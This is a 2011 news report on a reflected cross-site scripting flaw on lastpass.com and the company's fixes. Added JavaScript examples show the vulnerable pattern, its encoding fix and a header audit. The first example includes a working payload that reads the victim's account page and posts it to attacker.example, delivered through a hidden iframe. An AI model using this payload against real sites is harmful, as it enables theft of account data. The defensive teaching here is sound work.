Mar 1, 2011 07:19 GMT

Password management service LastPass has fixed a serious cross-site scripting vulnerability on its website which could have been exploited to obtain sensitive information about other people's accounts.

LastPass lets users generate a strong, unique password for each of their accounts and stores those credentials in an encrypted vault that is unlocked with a single master password.

The company offers extensions for all major browsers, which handle auto-fill and other operations, but stored credentials can also be accessed through the lastpass.com website itself.

The flaw on lastpass.com was discovered by Mike Cardwell, an independent security researcher from the UK, who reported it to the company.

"I reported this vulnerability responsibly, and they fixed it within three hours," Cardwell writes. However, he adds that "if you're a LastPass user you should still be very concerned though;

"I believe this is ultimately a problem with their architecture and something which could easily happen again in future."

The vulnerability, which LastPass describes as a reflected cross-site scripting (XSS) bug, could have been exploited by loading the vulnerable page, with the malicious script carried in its URL, inside a frame on an attacker-controlled website.

If a victim visited that website while logged into LastPass, the injected script would run in the lastpass.com origin with the victim's session, allowing the attacker to retrieve their email address, password reminder, list of stored sites and login history.
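The mechanism described above, as an added illustration that is not part of the original report and is neither LastPass's code nor Cardwell's proof of concept. It uses a hypothetical /search page that echoes a query parameter, shows the fix (output encoding), and shows why framing the page from another site gives the attacker the victim's authenticated session. The paths, parameter name, cookie name and attacker host are all assumptions.

```javascript
// Added example, not LastPass's code nor Cardwell's proof of concept. It shows the
// shape of a reflected XSS in a hypothetical /search page, the fix, and why framing
// the page from another site hands the attacker the victim's authenticated session.
// The paths, parameter name, cookie name and attacker host are all assumptions.

// Vulnerable: the search term is copied into the HTML unencoded, so a '<script>'
// tag in the query string is parsed and executed in the page's own origin.
function renderSearchVulnerable(term) {
  return `<html><body><h1>Results for ${term}</h1></body></html>`;
}

// Fix: encode the characters that can close a text node or an attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderSearchSafe(term) {
  return `<html><body><h1>Results for ${escapeHtml(term)}</h1></body></html>`;
}

// Hypothetical payload: from inside the vault site's origin, read the victim's
// account page and post it to the attacker. The browser attaches the victim's
// session cookie to the /account request because the script runs as the vault site.
const PAYLOAD =
  "<script>fetch('/account').then(r => r.text()).then(t =>" +
  " fetch('https://attacker.example/collect', { method: 'POST', body: t }))</script>";

// What the attacker hosts on their own domain: a hidden frame pointing at the
// vulnerable page with the payload in the URL, so the victim sees nothing unusual.
function attackerPage(vaultOrigin, payload) {
  const url = `${vaultOrigin}/search?q=${encodeURIComponent(payload)}`;
  return `<iframe src="${escapeHtml(url)}" style="display:none"></iframe>`;
}

// True when the rendered page carries the request-supplied script tag verbatim.
function reflectsScript(html, term) {
  return /<script[\s>]/i.test(term) && html.includes(term);
}

// Stand-alone demo server: /search?q=... (vulnerable), /safe?q=... (fixed) and
// /account, which returns constructed data only when a 'session' cookie is present.
// Start with: node reflected-xss.js 8080
if (typeof require !== 'undefined' && require.main === module && process.argv[2]) {
  const http = require('http');
  http.createServer((req, res) => {
    const u = new URL(req.url, 'http://localhost');
    const q = u.searchParams.get('q') || '';
    res.setHeader('Content-Type', 'text/html; charset=utf-8');
    if (u.pathname === '/search') return res.end(renderSearchVulnerable(q));
    if (u.pathname === '/safe') return res.end(renderSearchSafe(q));
    if (u.pathname === '/account') {
      const loggedIn = /(^|;\s*)session=/.test(req.headers.cookie || '');
      return res.end(loggedIn ? 'email=victim@example.com (constructed)' : 'not logged in');
    }
    res.statusCode = 404;
    res.end('not found');
  }).listen(Number(process.argv[2]));
}
```

The point to take from the example is that the frame is only a delivery vehicle: the script inside it runs as the vault site, not as the attacker's site, so every request it makes to the vault site is authenticated by the victim's cookies. Encoding the reflected value before it reaches the HTML is what removes the bug; blocking framing merely removes the quiet way of triggering it.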

In a post on its official blog, LastPass assures users that the vulnerability was fixed before anyone had the chance to exploit it for malicious purposes.

"The cause of this issue was with our testing procedure for this particular case, which has been rectified," the company says, adding that it has also made other security-related changes to its website.

One was to deploy HTTP Strict Transport Security (HSTS), a response header that instructs supporting browsers such as Chrome and Firefox to connect to the site only over HTTPS for the period the header specifies, rewriting plain http:// links to the site before any request is sent.

It also improved input filtering and added the X-Frame-Options response header, which tells browsers not to render the site's pages inside a frame on another site. That blocks the delivery method used in this attack but does not by itself remove an XSS bug, which is what the filtering addresses.

Finally, the company is also adding support for Content Security Policy (CSP), a specification first implemented by Mozilla, which lets a site whitelist the origins from which scripts and other content may be loaded and, by default, refuses to run inline scripts such as those injected through XSS.
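The three header-based defences listed above, as an added example that is not LastPass's configuration: a set of hardened response headers and a small audit that reports which of the three a response lacks. The header values, the one-year threshold and the wording of the findings are this example's choices.

```javascript
// Added example, not LastPass's configuration. Hardened response headers for the
// three defences named in the report, plus an audit that flags which are missing
// or weak. Values and thresholds are this example's choices.

// In 2011 Firefox read Mozilla's draft under the name X-Content-Security-Policy;
// the standardised header is Content-Security-Policy, so both are sent here.
const HARDENED_HEADERS = {
  'strict-transport-security': 'max-age=31536000; includeSubDomains',
  'x-frame-options': 'DENY',
  'content-security-policy': "default-src 'self'; frame-ancestors 'none'",
  'x-content-security-policy': "default-src 'self'",
};

const ONE_YEAR = 365 * 24 * 3600;

// Parse "max-age=N; includeSubDomains" into its parts; returns null when absent.
function parseHsts(value) {
  if (!value) return null;
  const directives = value.split(';').map((d) => d.trim().toLowerCase());
  const maxAge = directives.find((d) => d.startsWith('max-age='));
  return {
    maxAge: maxAge ? Number(maxAge.slice('max-age='.length)) : NaN,
    includeSubDomains: directives.includes('includesubdomains'),
  };
}

// Audit a response's headers (keys lower-cased, as Node's http client returns them).
// Returns a list of findings; an empty list means all three defences are present.
function auditHeaders(headers) {
  const findings = [];

  // HSTS: absent, or too short to survive between visits, leaves http:// reachable.
  const hsts = parseHsts(headers['strict-transport-security']);
  if (!hsts) {
    findings.push('HSTS missing: browsers will still follow http:// links to the site');
  } else if (!(hsts.maxAge >= ONE_YEAR)) {
    findings.push(`HSTS max-age ${hsts.maxAge} is below one year`);
  }

  // Framing: either X-Frame-Options or a CSP frame-ancestors directive will do.
  const xfo = (headers['x-frame-options'] || '').trim().toUpperCase();
  const csp = headers['content-security-policy'] || '';
  const frameAncestors = /frame-ancestors\s+'none'/i.test(csp);
  if (!(xfo === 'DENY' || xfo === 'SAMEORIGIN') && !frameAncestors) {
    findings.push('no framing protection: page can be embedded in an attacker-controlled frame');
  }

  // CSP: missing, or present but re-enabling inline script, leaves reflected XSS live.
  if (!csp && !headers['x-content-security-policy']) {
    findings.push('no Content-Security-Policy: injected inline script would run unrestricted');
  } else if (/'unsafe-inline'/i.test(csp)) {
    findings.push("CSP allows 'unsafe-inline': reflected script still executes");
  }
  return findings;
}

// Stand-alone use against a live site: node headers.js https://example.com/
if (typeof require !== 'undefined' && require.main === module && process.argv[2]) {
  const target = process.argv[2];
  const client = require(target.startsWith('https:') ? 'https' : 'http');
  client.get(target, (res) => {
    const findings = auditHeaders(res.headers);
    console.log(findings.length ? findings.join('\n') : 'all three defences present');
    res.resume();
  }).on('error', (e) => console.error(e.message));
}
```

Two caveats a practitioner would want: HSTS only takes effect after the browser has seen the header over a successful HTTPS connection, so the very first visit is unprotected unless the site is on a browser's preload list; and a CSP that includes 'unsafe-inline' for scripts gives up the one property that matters against reflected XSS, which is why the audit treats it as a finding rather than as coverage.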